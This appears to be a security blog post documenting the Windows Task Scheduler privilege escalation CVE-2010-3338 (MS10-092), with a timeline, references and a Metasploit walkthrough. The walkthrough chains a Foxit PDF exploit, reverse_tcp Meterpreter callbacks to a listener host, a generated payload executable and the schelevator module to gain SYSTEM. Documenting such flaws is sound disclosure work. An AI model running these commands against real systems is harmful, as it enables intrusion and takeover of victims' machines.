Timeline :
webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20
PoC provided by :
webDEViL
jduck
Reference(s) :
CVE-2010-3338
EDB-ID-15589
MS10-092
Affected version(s) :
Should work on Vista/Win7/2008 x86/x64
Tested on Windows 7 Integral
Description :
Stuxnet is not yet inhume, on four discovered 0day, only three of them where patched by Microsoft during the October second Tuesday. The last one has beenĀ reveled by webDEViL the 21 October on Exploit-DB, and one day later, this new still unpatched 0day, has been integrated into Metasploit by Rapid7 team.
This vulnerability permit to a local unprivileged user to do a “privilege escalation” attack by running the Windows scheduler on Windows Vista, Seven and 2008.
Here under a video demonstrating the privilege escalation between an another 0day disclosed by Corelan Team on Foxit PDF Reader.
Commands :
Foxit PDF Reader exploitation
use exploit/windows/fileformat/foxit_title_bĀof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsysinfo
getuid
getprivs
Creating a test.exe containing a reverse_tcp meterpreter payload
sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe
Launching a second multi handler listener with msfcli
sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E
Running schelevator to gain system privileges
run schelevator -u test.exe
getuid
getprivs